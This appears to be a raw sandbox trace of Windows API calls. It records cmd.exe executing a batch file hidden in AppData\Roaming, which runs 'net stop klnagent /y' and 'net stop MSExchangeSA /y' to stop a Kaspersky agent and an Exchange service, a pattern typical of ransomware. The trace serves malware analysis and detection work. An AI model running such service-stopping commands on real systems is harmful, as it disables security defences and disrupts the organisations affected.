0x3 [0198.252] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0198.252] GetLastError () returned 0x2 [0198.252] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0198.252] GetLastError () returned 0x2 [0198.253] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0198.253] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0198.253] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0198.254] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0198.254] GetLastError () returned 0x2 [0198.254] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0198.254] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0198.255] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0198.255] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0198.255] SetErrorMode (uMode=0x0) returned 0x1 [0198.255] GetProcessHeap () returned 0x3e0000 [0198.255] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0198.256] GetProcessHeap () returned 0x3e0000 [0198.256] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0198.256] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0198.256] GetProcessHeap () returned 0x3e0000 [0198.256] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0198.256] GetProcessHeap () returned 0x3e0000 [0198.256] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0198.256] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0198.257] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0198.257] GetLastError () returned 0x2 [0198.257] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0198.257] GetLastError () returned 0x2 [0198.258] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0198.258] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0198.258] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0198.258] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0198.259] GetLastError () returned 0x2 [0198.259] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0198.259] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0198.259] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0198.260] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0198.260] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0198.260] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0198.260] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0198.260] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop klnagent /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop klnagent /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop klnagent /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0xa3c, dwThreadId=0xa44)) returned 1 [0198.264] CloseHandle (hObject=0x74) returned 1 [0198.264] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0198.264] GetProcessHeap () returned 0x3e0000 [0198.264] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0198.264] GetEnvironmentStringsW () returned 0x3f8408* [0198.264] GetProcessHeap () returned 0x3e0000 [0198.264] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0198.264] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0198.264] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0198.405] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0198.405] CloseHandle (hObject=0x78) returned 1 [0198.405] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0198.405] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0198.405] GetProcessHeap () returned 0x3e0000 [0198.405] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0198.405] GetEnvironmentStringsW () returned 0x3f8408* [0198.405] GetProcessHeap () returned 0x3e0000 [0198.405] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0198.406] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0198.406] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0198.406] GetProcessHeap () returned 0x3e0000 [0198.406] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0198.406] GetEnvironmentStringsW () returned 0x3f8408* [0198.406] GetProcessHeap () returned 0x3e0000 [0198.406] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0198.406] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0198.406] GetProcessHeap () returned 0x3e0000 [0198.406] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0198.406] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0198.406] _get_osfhandle (_FileHandle=1) returned 0x264 [0198.406] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0198.406] _get_osfhandle (_FileHandle=1) returned 0x264 [0198.406] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0198.406] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0198.406] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0198.406] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0198.406] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0198.407] SetConsoleInputExeNameW () returned 0x1 [0198.407] GetConsoleOutputCP () returned 0x1b5 [0198.407] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0198.407] SetThreadUILanguage (LangId=0x0) returned 0x409 [0198.407] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0198.407] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0198.407] _get_osfhandle (_FileHandle=3) returned 0x78 [0198.407] SetFilePointer (in: hFile=0x78, lDistanceToMove=2711, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa97 [0198.407] GetProcessHeap () returned 0x3e0000 [0198.407] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0198.407] GetProcessHeap () returned 0x3e0000 [0198.407] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0198.407] GetProcessHeap () returned 0x3e0000 [0198.407] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0198.408] GetProcessHeap () returned 0x3e0000 [0198.408] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0198.408] GetProcessHeap () returned 0x3e0000 [0198.408] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0198.408] GetProcessHeap () returned 0x3e0000 [0198.408] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0198.408] GetProcessHeap () returned 0x3e0000 [0198.408] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0198.408] GetProcessHeap () returned 0x3e0000 [0198.408] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0198.408] GetProcessHeap () returned 0x3e0000 [0198.408] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0198.408] GetProcessHeap () returned 0x3e0000 [0198.408] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0198.408] GetProcessHeap () returned 0x3e0000 [0198.408] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1290 | out: hHeap=0x3e0000) returned 1 [0198.408] GetProcessHeap () returned 0x3e0000 [0198.408] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0198.408] GetProcessHeap () returned 0x3e0000 [0198.408] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0198.408] _get_osfhandle (_FileHandle=3) returned 0x78 [0198.408] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa97 [0198.408] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0xe2a, lpOverlapped=0x0) returned 1 [0198.408] SetFilePointer (in: hFile=0x78, lDistanceToMove=2737, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xab1 [0198.408] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=26, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop MSExchangeSA /y\r\n8R2 /y\r\nce /y\r\n\r\n\r\nÇ¥ /y\r\nlures\r\nnded\r\n") returned 26 [0198.409] _get_osfhandle (_FileHandle=3) returned 0x78 [0198.409] GetFileType (hFile=0x78) returned 0x1 [0198.409] _get_osfhandle (_FileHandle=3) returned 0x78 [0198.409] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xab1 [0198.409] GetProcessHeap () returned 0x3e0000 [0198.409] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0198.409] GetProcessHeap () returned 0x3e0000 [0198.409] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0198.412] _tell (_FileHandle=3) returned 2737 [0198.412] _close (_FileHandle=3) returned 0 [0198.412] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0198.413] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0198.413] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0198.413] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0198.413] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0198.413] _wcsicmp (_String1="net", _String2="CD") returned 11 [0198.413] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0198.413] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0198.413] _wcsicmp (_String1="net", _String2="REN") returned -4 [0198.413] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0198.413] _wcsicmp (_String1="net", _String2="SET") returned -5 [0198.413] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0198.413] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0198.413] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0198.413] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0198.413] _wcsicmp (_String1="net", _String2="MD") returned 1 [0198.413] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0198.413] _wcsicmp (_String1="net", _String2="RD") returned -4 [0198.413] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0198.413] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0198.413] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0198.413] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0198.413] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0198.413] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0198.413] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0198.413] _wcsicmp (_String1="net", _String2="VER") returned -8 [0198.413] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0198.413] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0198.413] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0198.413] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0198.413] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0198.413] _wcsicmp (_String1="net", _String2="START") returned -5 [0198.413] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0198.413] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0198.413] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0198.413] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0198.413] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0198.413] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0198.413] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0198.414] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0198.414] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0198.414] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0198.414] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0198.414] SetErrorMode (uMode=0x0) returned 0x1 [0198.414] GetProcessHeap () returned 0x3e0000 [0198.414] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0198.414] GetProcessHeap () returned 0x3e0000 [0198.414] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0198.415] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0198.415] GetProcessHeap () returned 0x3e0000 [0198.415] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0198.415] GetProcessHeap () returned 0x3e0000 [0198.415] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0198.415] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0198.416] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0198.416] GetLastError () returned 0x2 [0198.416] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0198.416] GetLastError () returned 0x2 [0198.417] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0198.417] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0198.417] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0198.417] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0198.418] GetLastError () returned 0x2 [0198.418] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0198.418] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0198.418] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0198.420] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0198.420] SetErrorMode (uMode=0x0) returned 0x1 [0198.420] GetProcessHeap () returned 0x3e0000 [0198.420] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0198.420] GetProcessHeap () returned 0x3e0000 [0198.420] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0198.420] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0198.420] GetProcessHeap () returned 0x3e0000 [0198.420] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0198.420] GetProcessHeap () returned 0x3e0000 [0198.420] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0198.421] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0198.421] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0198.421] GetLastError () returned 0x2 [0198.421] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0198.421] GetLastError () returned 0x2 [0198.422] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0198.422] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0198.422] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0198.423] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0198.423] GetLastError () returned 0x2 [0198.423] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0198.423] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0198.424] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0198.424] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0198.424] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0198.424] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0198.424] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0198.424] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSExchangeSA /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSExchangeSA /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop MSExchangeSA /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0xa9c, dwThreadId=0xa4c)) returned 1 [0198.428] CloseHandle (hObject=0x78) returned 1 [0198.428] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0198.428] GetProcessHeap () returned 0x3e0000 [0198.428] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0198.428] GetEnvironmentStringsW () returned 0x3f8408* [0198.428] GetProcessHeap () returned 0x3e0000 [0198.428] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0198.428] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0198.428] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0198.552] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0198.552] CloseHandle (hObject=0x74) returned 1 [0198.552] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0198.552] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0198.552] GetProcessHeap () returned 0x3e0000 [0198.552] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0198.552] GetEnvironmentStringsW () returned 0x3f8408* [0198.552] GetProcessHeap () returned 0x3e0000 [0198.552] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0198.552] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0198.552] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0198.552] GetProcessHeap () returned 0x3e0000 [0198.552] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0198.552] GetEnvironmentStringsW () returned 0x3f8408* [0198.552] GetProcessHeap () returned 0x3e0000 [0198.552] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0198.552] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0198.552] GetProcessHeap () returned 0x3e0000 [0198.553] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0198.553] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0198.553] _get_osfhandle (_FileHandle=1) returned 0x264 [0198.553] SetConsoleMode 